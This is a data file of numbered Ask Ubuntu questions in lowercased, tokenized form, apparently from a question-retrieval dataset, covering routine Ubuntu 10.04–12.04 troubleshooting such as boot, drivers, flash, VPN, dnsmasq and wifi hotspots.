117742	password recovery	i have ubuntu 11.1 , do not remember setting it up with a password but , now it will not let me in without a password . is there a default password ? can i retrieve a password ? can i change a password without knowing the old one ?
117743	folder sizes in nautilus	back when i was using xp i had this program called folder sizes that showed the folder ( also file ) size in the explorer column i was wondering will that option be or is available in nautilus or other file-manager screenshot
117744	how can i install on a non-pae cpu ? ( error `` kernel requires features not present on the cpu : pae '' )	after burning ubuntu 12.04 to a cd , i tried booting and got the message : this kernel requires the following features not present on the cpu : pae unable to boot - please use a kernel appropriate for your cpu . what does this mean ?
117746	ca n't chmod on external hard disk ?	i have an usb3.0 external hard disk , partitioned to 3 ntfs partitions . when i plug the hard disk in , the 3 partitions automatically mounted under /media . so far so good . i can read and write to files , or mkdir , etc on these partitions . but i ca n't do chmod/chown on any of the files/directories on these partitions . the owner : group always myself , and the mode are always 700 for directories and 600 for files . i have another partition on internal harddisk also mounted . that partition works fine . i looked the output of mount command , the only difference between mount options is that there is one extra 'default_permissions ' on the external hard disks . anyway i can set the owner : group and mode on these files and directories .
117757	what has ubuntu contributed to the linux kernel ?	this question is similar to this one : what unique enhancements and features has ubuntu brought to the linux community but in this case it is directed towards what has ubuntu contributed to the official linux kernel . many times i have heared about intel contributing patches to the linux kernel like the rc6 latest patches and many more related to recent support for sandy/ivy bridge . in another group , android did an upstream patch and a lot of arm patches have also come to the linux kernel . i have seeing a small percent of companies and groups that have contributed to the linux kernel ( http : //kernel.org ) but what i want to know is , since the beginning of ubuntu till now , what has ubuntu contributed to the linux kernel in regards to any aspect of the kernel . for kernel information i typically go to http : //kernelnewbies.org and http : //kernel.org
117761	problems in fetching upgrades	presently using ubuntu 10.04 and i would like to upgrade to the latest ubuntu release but while trying to ugrade i have this errors . can anybody help me how to solve this and proceed..just a beginner in using ubuntu . thanks w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-image-generic_2.6.32.38.44_i386.deb 404 not found [ ip : 91.189.92.166 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/l/linux-meta/linux-headers-generic_2.6.32.38.44_i386.deb 404 not found [ ip : 91.189.92.166 80 ]
117775	unallocated disk space	i had a dual boot-able system with ubuntu 12.04 and debian . i wanted to remove debian so i opened gparted and deleted the partition with debian . after doing so i thought i could simply resize the ubuntu partition but i am not able . now i am left with partitions : 1 ) /dev/sda1 ( ext4 ) 2 ) /dev/sda2 extended > unallocated 3 ) /dev/sda5linux-swap sorry ca n't attach a picture . i also ran gparted from a live cd but had the same problems . all i really want is ubuntu on one partition and of course the linux swap . does anyone have a way to fix my situation i would appreciate it . thank you .
117776	how to obtain the geometry of an x window using bash ?	i am looking for a way to retrieve information ( specifically geometry ) about an x window in a bash script and perform some action depending on the value . for example , if the window is positioned somewhere between 0x0 and 40x40 , i want to take a specific action . otherwise , i need the script to take another action .
117777	is there a way to programatically detach the built in media player from dbus ?	the use case is : i want to programatically control vlc or some other media player via dbus from python as a screenlet . so in order for the other media player to register with dbus , i need to `` unhook '' banshee in a clean way . i 'm hoping for something more graceful than killall banshee . an alternate solution could include forcing banshee not to launch on boot , so it does n't register with dbus .
117778	help w/ adobe flash installation	i am trying to download adobe flash and i am new to linux and ubuntu . help .
117782	can not download anything on ubuntu , any ideas ?	it says that it can not connect to the internet and it shows me the following , when i 'm actually on-line at the moment and chating away : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/c/chromium-browser/chromium-codecs-ffmpeg_17.0.963.79~r125985-0ubuntu1_amd64.deb 404 not found [ ip : 00.000.00.000 00 ] failed to fetch http : //archive.ubuntu.com/ubuntu/pool/universe/c/chromium-browser/chromium-browser_17.0.963.79~r125985-0ubuntu1_amd64.deb 404 not found [ ip : 00.000.00.000 00 ] ( next to ip : there is my actual ip address ) and it is not just for downloading chronium , it is anything i try to download .
117790	where does winetricks store downloaded components	when downloading an program like .net 3.5 or any component with winetricks , where does it store this downloaded components . my intention is to save time and copy them to other computers so i do not have to download them again .
117791	`` show desktop '' not in nautilus preferences ?	trying to get multiple backgrounds for different workspaces in 11.10 , but having some difficulty . every guide i see says to change the nautilus setting `` show desktop '' to unchecked , but i do n't have that setting at all . help ?
117798	kiosk mode coding in chromium	i do n't know how easy this would be , since i do n't know anything about it , but i need an ubuntu setup where the machine boots up , displays the login for a few seconds allowing a chance to log in as an admin , and then precedes to automatically log in to a user account which directly opens chromium ( any other browser is acceptable ) in a kiosk mode where only the web content is visible , all chromium keyboard shortcuts are disabled , and all but a select few websites are blocked , redirecting back to the home page after an `` unauthorized web page '' warning comes up if the url constraint is violated . is it possible to code a kiosk setup like this , or am i asking for too much ? if i 'm simply uninformed , and there is already much documentation on anything like this , please redirect me to an appropriate page . if you can code or set up something like my description , please reply with step-by-step instructions , and instructions on how to modify the elements of the kiosk mode . thank you in advance for any help . ( note : i 'm currently using ubuntu 10.04 , but any distribution would work . )
117802	how to get rid of wine windows program loader icon in ubuntu unity ?	i have a wine application launcher in ubuntu unity ( 11.10 ) . and when i run a wine application `` wine window program loader '' icon appears . here is an example what happens : i would like to achieve that the application opens in the same launcher , so i can use keyboard shortcuts to switch to this application . i 'd appreciate any help . ps . : i use ubuntu 11.10 and unity 2d edit : i figured out , that if i add startupwmclass=wine to the .desktop file , `` wine window program loader '' icon disappears . but unfortunately that causes all wine apps to be associated with that specific icon in the launcher .
117807	how to connect mts mblaze	i have installed ubuntu 11.04 inside the windows xp . i have mts mblaze usb modem . ( my service provider is mts mblaze , india ) i want to use mblaze into ubuntu so that i did the following steps for make connecting the device . from the task bar- > edit connections- > mobile broadband- > choose country- > mts mblaze and ok i give username and password ( internet @ internet.mtsindia.in and password mts . ok now i enable mobile broadband , mts mblaze connection1 ( connection name ) from task bar . steps followed from `` http : //randomshandom.wordpress.com/2010/12/20/how-to-connect-mts-mblaze-device-in-ubuntu-10-10-11-04/ # more-3 '' for the first time it successfully connected and browse the internet . after i restart the system i connect it . it does not connected . it shows modem network disconnected . i accessed many times and delete the connection and recreated but i does not help me . if i try to connect device i think it the search the network , i saw the wave signal . img image for showing problem :
117810	how do you turn off touch on a wacom bamboo cth-470 ?	i bought my girlfriend a wacom bamboo cth-470 recently and it is running well after installing wacom-dkms . i have now run into a wall that i do n't know how to get around . the touch on the tablet will not turn off . i am running ubuntu 12.04 beta 2 . i have tried turning the touch off from the wacom settings in the settings menu . the pen and touch both work perfectly fine , it is just that the touch drives her insane when trying to draw in mypaint .
117814	how can i add/remove music from my ipod on banshee ?	i have a 8gb 4th generation nano that i would like to begin using with banshee . it 's currently full and i need to delete some music on it . is it possible to remove songs and add new ones using banshee or do i need to use rhythmbox or gtkpod ?
117815	whenever i try to install using terminal , i get this error . how to fix this ?	e : the package ttf-mscorefonts-installer needs to be reinstalled , but i ca n't find an archive for it .
117822	how to upgrade samba on 10.04.04 ?	on ubuntu 10.04.4 there is an old samba 3.4.7 how can i upgrade it to the latest 3.5.13 or 3.6.3 ?
117826	i want to remove ubuntu 11.10 and try kubuntu 11.04 but i ca n't get my kubuntu live disc to work	to make a long story short , i attempted to enhance my 11.10 os by installing the satanic edition . unfortunately , it 's not compatible with 11.10 ( a fact that i discovered too late ) and as a result of attempting to install the packages separetly , i ended up with e : malformed line 55 in source list /etc/apt/sources.list ( dist parse ) if there is a way to fix this , that would be great . but i 've grown weary of ubuntu 11.10 anyway & i wanted to give kubuntu a try-or at least go back to 11.04 . well , i ca n't get either disc to run as a live cd with the option of granting me a full installation to replace 11.10 . they have exe files that wo n't open on linux . how can i fix this so i can return to 11.04 or try kubuntu ? thanks for any advise in advance .
117830	where can i download myunity visual ?	there is a myunity version that can tweak the unity desktop in a visual way like so my unity visual youtube video ) . in the myunity ppa and the homepage , there is no beta / alpha download option . my question is where can i download it ?
117831	flash displays black screen no video youtube firefox 11	the title says it all , flash aid has not helped the situation & google has not thrown up any recent similarities . i am running xubuntu lts . about : plugins ~ file : libflashplayer.so version : shockwave flash 11.2 r202 ii flashplugin-installer 11.2.202.228ubuntu0.10.04.1 adobe flash player plugin installer ii libswfdec-0.8-0 0.8.4-1build1 swf ( macromedia flash ) decoder library ii swfdec-mozilla 0.8.2-1ubuntu2 mozilla plugin for swf files ( macromedia flash ) solved : regular update , seems to have solved itself . thanks
117834	how to make connect communications vpn connection in 10.10 ?	these steps were send by my isp admin for ver10.10 and i 'm using 11.10 ... step 1 sucessfully implemented till point 7 after that the problems are marked after '//' step 2 i can not completely do the step 2 how to make connect communications vpn connection in ubuntu 10.10 . 1st step : - 1- go to system > administration > synaptic package manage 2- search for “pptp” , check “network-manager-pptp” and click “apply” 3- click on the network manager tray icon with your right mouse button and choose “edit connections…” . 4- go to the “vpn” tab and click “add” . 5- choose “point-to-point tunneling protocol ( pptp ) ” as the vpn connection type 6- check the vpn connection type and click “create” . 7- give your vpn connection a name and assign all the necessary information • gateway = blue.connect.net.pk if you got blue package or • gateway = green.connect.net.pk if you got green package or • gateway = blueplus.connect.net.pk if you got blueplus package or • gateway = red.connect.net.pk if you got red package • user name = connect communications userid • password = connect communications password 8- now click on “advanced” authentication • unchecked “pap '' // can not uncheck • unchecked “mschap '' // can not uncheck • unchecked “chap '' • checked only “mschapv2 '' eap shown in ver11.10 and can not be unchecked security and compression . • unchecked “use point-to-point encryption ( mppe ) ” . • unchecked “allow statefull encryption” . • unchecked “allow bsd data compression” . • unchecked “allow deflate data compression” . • unchecked “use tcp header compression” . • unchecked “send ppp echo packets” then press “ok” then “apply” . 9-now you are able to connect to the specified vpn connection via the networking manager then you can connect to vpn in the menu bar and your internet icon will have a lock when the connection is successful . 2nd step : - open terminal window . first , you open a terminal ( applications > accessories > terminal ) : run command “sudo” now gave root password . then run command “netstat -r -n” it will show some lines and for example from the last line pick the ip from 2nd column like 10.111.0.1 0.0.0.0 10.111.0.1 0.0.0.0 ug 0 0 0 eth0 now run the fallowing command . echo “route add -net 10.101.8.0 netmask 255.255.252.0 gw 10.152.24.1” > /etc/rc.local note : - 10.111.0.1 is an example ip now run “ sh /etc/rc.local “
117838	is there a website where i can see new applications for linux/ubuntu ?	is there a website where i can see new applications for linux/ubuntu ? i want to find new applications that are available for linux , is there an easy way ?
117842	no sound from speakers , but headphones work	i have had a problem with my sound for a while now . sound comes from my headphones , but not from my speakers . i am running ubuntu 11.10 on a compaq 320 . i have searched around , but none of the threads have worked , some had made it worse ( no sound at all , but i managed to get back to where i am now ) . any help would on how to fix this would be great .
117850	ca n't exec `` locale '' : no such file or directory	i am new in linux . i was trying to install wine and after /i followed instructions from a youtube video i got to the point where i needed to install wine from ubuntu software center . the problem is the ubuntu software center does n't work anymore , it ask me to reparir it , and when i push the repair button it gives me this error : installarchives ( ) failed : ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... ca n't exec `` locale '' : no such file or directory at /usr/share/perl5/debconf/encoding.pm line 16 . use of uninitialized value $ debconf : :encoding : :charmap in scalar chomp at /usr/share/perl5/debconf/encoding.pm line 17 . preconfiguring packages ... dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin . error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 2 ) please help me . thank you : d
117852	ubuntu `` server '' but with a better terminal ?	i 'm currently using ubuntu server installed in virtualbox for running various server services . the only drawback it posses for me is that i can not use mouse in the terminal and select/copy/paste stuff . what would be an alternative in this situation to get a better terminal ? i guess ubuntu server itself does n't support mouse , so i 'd have to go for ubuntu desktop , but it seems like a huge waste of resources to run unity/gnome3 in virtualbox only to have a terminal . so then i 'm wondering whether xubuntu/lubuntu would be suitable alternatives , although they still take a lot of time to boot up , etc . any ideas how to solve this scenario ?
117853	how do i stop banshee from putting a notification in the panel for every song ?	as a playlist or internet radio station plays , a notification pops up in the top right corner every time the song changes . i ca n't find any way either within banshee or settings in general to stop this . how do i stop banshee from putting a notification in the panel for every song ? further , can i stop banshee from outputting any notifications at all ? update : i tried going into banshee → edit → preferences → extensions , and disabled the sound menu integration , but this does not seem to stop notifications .
117857	will 11.10 or 12.04 run on my system ?	i have an old pc , so i am curious about runing ubuntu 11.10 or 12.04 on my configuration . is it possible to run them on this : processor : amd athlon +2200 1.8ghz overclocked to 2ghz . motherboard : asus a7v8x-x . graphic card : diamond ati radeon 9550 128mb . ram : 1 gb ( 256mb+256mb+512mb ) kingston ddr sdram . hdd : 160gb ( 80gb+80g ) maxtor .
117858	how to convert wma lossless to flac ?	i have some cds that i want to convert to flac . banshee ca n't find their metadata , but windows media player can . i figured there are two workarounds : rip all cds using windows media player wma-lossless , and batch-convert to flac with metadata . tweak banshee to connect to windows media player metadata sources any ideas how to do it ? i 'm preferably looking for a command-line method .
117862	how do i dual boot windows 7 and ubuntu without having to go through 2 windows when i boot ubuntu ?	so , here 's the deal . i want to install ubuntu alongside windows 7 and i do know how do to that . my problem is , i do n't want to go through 2 screens when i dual boot ubuntu ! is that possible ? here is the second screen i do n't want to go through !
117865	rhythmbox is crashing on start	i 'm using ubuntu 10.10 and until about 3 days ago rhythmbox worked fine but now when i start it , it opens , then after 4 second it crashes . when running it from terminal i get this : > ~ $ rhythmbox ( rhythmbox:27420 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** message : pygobject_register_sinkfunc is deprecated ( gstobject ) > ( rhythmbox:27420 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed segmentation fault and then rhythmbox closes . what to do ? edit : disabled most of the plugins and it 's not crashing now , but i still get this when running from terminal : > ( rhythmbox:27420 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed ** message : pygobject_register_sinkfunc is deprecated ( gstobject ) > ( rhythmbox:27420 ) : glib-gobject-critical ** : g_object_unref : assertion `g_is_object ( object ) ' failed should i worry ?
117876	executing `` unicode '' python script from gedit vs terminal	as can be seen from screenshot , same script run from terminal and gedit behaves differently - in terminal script executes succesfully and in gedit it raises error : but if i change python in gedit tool manager to pythonioencoding=utf-8 python , then script will execute fine also from gedit why is this , and what setting in terminal allows python `` unicode '' code to execute without issues ? just to update as i added bounty : it 's not just gedit , but also in scite error is raised , but not in geany as geany executes python scripts through terminal
117878	ubuntu ambiance top windows not appearing gray	i recently installed ubuntu tweak and a pack of icons called fs-icons-ubuntu . soo far it worked well . but ! when i costumize my theme , i ca n't get the normal look of ambiance theme with gray bar in the top of the windows . i already tried a bunch of configs and i still do n't get the gray in the top window . so does anybody know what is might happening ? regards .
117879	is there a keyboard shortcut to open a new konsole tab ?	i want to open a new konsole tab with my keyboard . is there a shortcut for that ?
117889	boot loader problem	after installation of ubuntu to my new hdd , i putted my existing win 7 hdd to my motherboard . now when i tried to boot windows by default ubuntu is opening . plz do let me know how to fix the boot loader of ubuntu ?
117891	i 'll have what 's she 's having : point banshee to windows media player 's metadata sources	i have some cds that banshee ca n't find metadata for , but windows media player can . i was considering ripping using wmp and converting to banshee , but that seems like too much trouble . is there a way to give banshee a fallback from its original metadata source ( musicbrainz ) to whatever windows media player is using ?
117899	configure dnsmasq to use /etc/hosts file	i have installed dnsmasq but it was not starting as 53 port was busy . i found out that ubuntu already had dnsmasq package and it 's working . now the problem is ... i just want to be able to resolve my hosts in /etc/hosts through it i.e : nslookup somehostonlan localhost to be resolved to certain ip taken from /etc/hosts file . but this is not happening . why ? btw , as the caching dns server it 's working fine . i just want it to resolve hosts from /etc/hosts file that 's all
117904	how to install kde plasma desktop on ubuntu ?	hey guys i am new to ubuntu , i have installed ubuntu 11.10 , with gnome , and i am not so happy with unity , i want to install kde plasma , can i install kde plasma on ubuntu , or i have to download entire os again to have kds plasma desktop .
117910	skype does n't work through empathy 3.4 but works in pidgin	i 'm trying to connect to skype throught empathy 3.4 in ubuntu 12.04 i386 ( last update installed ) i installed the pidgin-skype plugin , but there is no bigbrownchunx-skype-dbus protocol in list . it works fine with pidgin .
117913	personalisation of the ubuntu interface	it 's quite hard to phrase this question as the answer is very subjective and i do n't know the right terminology to ask for what i want , but i will try my best . i love linux and would love to use it full-time as my main os but the one think i have a problem with is the look of it . in my opinion it looks like it was designed for a child and i like my computer to look stylish rather than dated ( this is opinion obviously ) . i like the look of osx but there are certain things that i do n't like , so no , i am not asking the age old question of `` how do i make ubuntu look like osx '' ... most of the attempts i have seen of this have been pretty poor when put up against the real thing so i just want to take certain things from it . things i 'd like to take from osx : spotlight ( i do n't like the unity dashboard-esque thingy ) expose spaces dock ( at the bottom ) icons ( apart from the apple one ) look of file manager - its more pleasant to navigate around the file system . closing an application window does n't actually quit the program , so when you next launch it - it is instantaneous . global menu ( at the top ) what are the latest ubuntu alternatives to these ? when it comes to actually changing the look of ubuntu what should i be looking at ? i know the following exists : shell theme icons fonts ... but is there anything else i need to look into to actually change the look ? i hear the term `` window manager '' thrown around , but i do n't actually know what that is . what are good sources for reviews/links to the latest and greatest customisation techniques ? ubuntu now comes with unity which i do n't like very much . what are my alternatives ? should i look into gnome3 or switch to classic desktop which is gnome2 if i recall correctly ? i hope i have n't put too much in one question and that it makes sense . thanks .
117916	what kind of privacy policy is employed in ubuntuone ?	i want to ask : can someone else see or download my files from my ubuntuone account ? do i have complete privacy or not ?
117924	corrupted flash player plugin	i 'm using ubuntu 11.04 , and have installed both mozilla firefox and google-chrome . suddenly when i open youtube videos i see all colors in a blueish way . so i googled and found this answer explaining what to do . nevertheless the problem is still there and i just do n't know what to do . so i tried to completely uninstall firefox and chrome but nothing changed when reinstalling . i 'm starting to believe that somehow flash plugins may have been corrupted , but uninstalling via apt-get will not solve the problem cause when i install back nothing has changed . what should i do ? this problem is driving me nuts ...
117926	creating wifi hotspot for galaxy note	i follow the steps mentioned in many blog but my wifi ap is not scanned by my phone . my system config : - ubuntu 11.10 64-bit 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 04:00.0 network controller : intel corporation wifi link 5100 08:00.0 ethernet controller : broadcom corporation netlink bcm5784m gigabit ethernet pcie ( rev 10 ) please tell me you need any other info of my system ...
117928	what are the risks of installing a `` bad quality '' package ?	when i try to install sonic-visualiser_1.9cc-1_amd64.deb via the software center the following warning message is displayed : the package is of bad quality the installation of a package which violates the quality standards is n't allowed . this could cause serious problems on your computer . please contact the person or organisation who provided this package file and include the details beneath . lintian check results for /home/ak/downloads/sonic-visualiser_1.9cc-1_amd64.deb : use of uninitialized value $ env { `` home '' } in concatenation ( . ) or string at /usr/bin/lintian line 108 . e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/bin/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/bin/sonic-visualiser 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/applications/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/applications/sonic-visualiser.desktop 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/doc/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/doc/sonic-visualiser/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/doc/sonic-visualiser/changelog 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/doc/sonic-visualiser/copying 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/doc/sonic-visualiser/readme 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/mimelnk/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/mimelnk/application/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/mimelnk/application/x-sonicvisualiser-layer.desktop 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/mimelnk/application/x-sonicvisualiser.desktop 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/pixmaps/ 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/pixmaps/sv-icon-light.svg 1000/1000 e : sonic-visualiser : wrong-file-owner-uid-or-gid usr/share/pixmaps/sv-icon.svg 1000/1000 i understand that this means the package does n't meet debian policy and i know how to override the warning and install the package anyway . what are the risks of doing so ?
117931	how do i set up hosting a domain name at home with apache ?	i am relatively new to ubuntu linux and i am struggling to figure out the basic set-up of hosting a domain name at home with apache2 . i understand that you have to change your ip from dynamic to a static ip address but i am not sure how you achieve that step . i am looking for some assistance on this on how to enable self signing certificates , make the domain name resolve on the internet from hosting the website on the web server , enabling protected directories and the basic commands of accessing the directory where the website files can be uploaded and available on the world wide web .
117935	configuring 12voip with a sip softphone in ubuntu	i want to change my work pc to ubuntu but one thing is in my way ... we use 12voip since we did n't find lower calling rates in europe . the thing is 12voip does n't have a linux program : - ( . i tried to set it up with instructions from this page ( under 'software configuration ' ) with almost all clients that the software center of ubuntu offers , but the best results i got to had a lot of echo . now i must admit this echo exists also with the windows version of the program , but there- once you use headphones its gone , while on the ubuntu sip phones it stays and its worst in general . i do n't know if my problem has to do with codecs or something else , and i was hoping someone can help check it and tell me which sip phone i can work with , and instructions on how to configure it correctly . btw i tried google , and all i could find were questions like mine or similar , no good answers . thanks !
117945	not able to connect huawei ec1561	i have a huawei ec1561 broadband data card , isp-mts india . i am not able to connect internet through it . while connecting it via network manager it says `` you are registered with home network '' and again `` modem network disconnected '' . i think it is detected as a modem but not connecting properly . any help please ? i 'm hitting this rock with my head more than a month ... when i tried installing the driver that came with the device it finally says `` installing ndis driver failed '' . i can post further information if anybody helps
117947	how to install gimp 2.7 ?	here i ask this question since 12.04 beta 2 is usable and this question would come up sooner then later . after issuing the standard sudo add-apt-repository ppa : matthaeus123/mrw-gimp-svn sudo apt-get update i get the following errors . w : failed to fetch http : //ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/matthaeus123/mrw-gimp-svn/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . is there any way to get around this . excluding compiling from source as it usually introduces even more multilevel errors .
117949	have i fixed my partition problem with os x 10.5.8 ? are my gpt and mbr back to normal ?	i 'm new to linux and i have overstepped by abilities . i tried dual booting os x 10.5.8 with ubuntu 11.10 with refit , but i been having problems with partitioning . instead of enduring more headaches , i 've made the decision to simply use ubuntu on virtualbox . i 've tried to return my hdd to normal , but i am looking for confirmation that my partitions are ok . here is the report from partition inspector : *** report for internal hard disk *** current gpt partition table : # start lba end lba type 1 409640 233917359 mac os x hfs+ current mbr partition table : # a start lba end lba type 1 1 234441647 ee efi protective mbr contents : boot code : grub partition at lba 409640 : boot code : none file system : hfs extended ( hfs+ ) listed in gpt as partition 1 , type mac os x hfs+ also , my hdd directory has a bunch of extra folders in them and they appear to be ubuntu related , although it is no longer installed . folders like bin , sbin , cores , var , user , and so on . those folders are n't supposed to be there , right ? thanks in advance .
117950	how do i change file system in recovery mode to read-write mode ?	i have messed up my sudoers file and i want to change the permission on it . when i login in recovery mode , i can not run the command chmod as it is read-only option . i tried mount -o remount , rw / in recovery mode . did n't work for me : err : ext4-fs remount . opts errors=remount-ro how can i boot into recovery mode and with read-write option ?
117956	wifi works but does n't start automatically on ubuntu 11.10	good evening everyone , i have got an issue which i hope you will help me to solve . i was trying to update my kernel in ubuntu from this web-site http : //kernel.ubuntu.com/~kernel-ppa/mainline/v3.2-rc4-oneiric/ and everything went smooth . but , for some reason , my wifi does n't work in new kernel so i decided to switch back to my old one 3.0.0-17 generic and to my surprise wifi does n't start automatically eventhou it was working . what i mean is that i have to click on wifi icon and put a mark enable wireless . this is not a really serious issue but i do n't like switch on everytime at log in my wifi because before that it was working when system started . what is the cause of this and how to fix it . thank you very much for you help .
117967	is there any utility like `proxifier` for ubuntu ?	i 'm looking for a program which acts as a proxy manager for ubuntu just as proxifier does for windows .
117968	why does ubuntu/linux 's ui performance seem to be so much slower than windows ?	i 'm a long time linux advocate and user ( since around '98 ) . i rarely boot up windows , but when i do , it 's secretly frustrating to me how fast things seem to be . for example , when you type in ubuntu ( after typing in windows ) , there seems to me to be a very slight but perceptible lag between key press and character appearance . this also seems to be true in window rendering ( minimize/maximize ) and so on . the end result is that the windows 7 desktop experience seems more performant and zippy compared to ubuntu 11.x or 12.04 ( i 've comparison-tested both ) . as a fan of ubuntu and linux , this bothers me . is this lag caused by the extra layer that x windows brings ? is this what wayland aims to address ? or , is it something else ?
117969	wifi hotspot disconnected after some time	i am trying to use my ubuntu system as wifi hotspot , but for some reason hotspot get disconnected on its own . searching for the solution , i found this help : why is my ethernet connection connecting and disconnecting repeatedly ? reading through the above article i used the following command sudo killall dnsmasq as a result i manage to establish hotspot for around 5-10 sec before getting disconnected as against immediately ... . here 's the system log ( in case needed ) tail -f /var/log/syslog : apr 1 23:31:42 networkmanager [ 901 ] : < info > starting dnsmasq ... apr 1 23:31:42 networkmanager [ 901 ] : < info > ( wlan0 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] apr 1 23:31:42 dnsmasq [ 4159 ] : started , version 2.57 cachesize 150 apr 1 23:31:42 dnsmasq [ 4159 ] : compile time options : ipv6 gnu-getopt dbus i18n dhcp tftp idn apr 1 23:31:42 dnsmasq-dhcp [ 4159 ] : dhcp , ip range 10.42.43.10 -- 10.42.43.100 , lease time 1h apr 1 23:31:42 dnsmasq [ 4159 ] : reading /etc/resolv.conf apr 1 23:31:42 dnsmasq [ 4159 ] : using nameserver 220.226.6.104 # 53 apr 1 23:31:42 dnsmasq [ 4159 ] : using nameserver 220.226.100.40 # 53 apr 1 23:31:42 dnsmasq [ 4159 ] : cleared cache apr 1 23:31:42 networkmanager [ 901 ] : < info > activation ( wlan0 ) successful , device activated . apr 1 23:31:42 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) complete . apr 1 23:31:42 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip4 configure get ) complete . apr 1 23:31:42 dbus [ 885 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 1 23:31:42 dbus [ 885 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' connection established at this point ... .now disconnecting after 10 sec ... apr 1 23:31:52 ntpdate [ 4194 ] : adjust time server 91.189.94.4 offset -0.011589 sec apr 1 23:32:01 networkmanager [ 901 ] : < info > ( wlan0 ) : ip6 addrconf timed out or failed . apr 1 23:32:01 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) scheduled ... apr 1 23:32:01 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) started ... apr 1 23:32:01 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) started ... apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol tcp -- destination-port 53 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol udp -- destination-port 53 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol tcp -- destination-port 67 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol udp -- destination-port 67 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface wlan0 -- jump reject apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- out-interface wlan0 -- jump reject apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface wlan0 -- out-interface wlan0 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- source 10.42.43.0/255.255.255.0 -- in-interface wlan0 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- destination 10.42.43.0/255.255.255.0 -- out-interface wlan0 -- match state -- state established , related -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table nat -- insert postrouting -- source 10.42.43.0/255.255.255.0 ! -- destination 10.42.43.0/255.255.255.0 -- jump masquerade apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol tcp -- destination-port 53 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol udp -- destination-port 53 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 -- protocol tcp -- destination-port 67 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert input -- in-interface wlan0 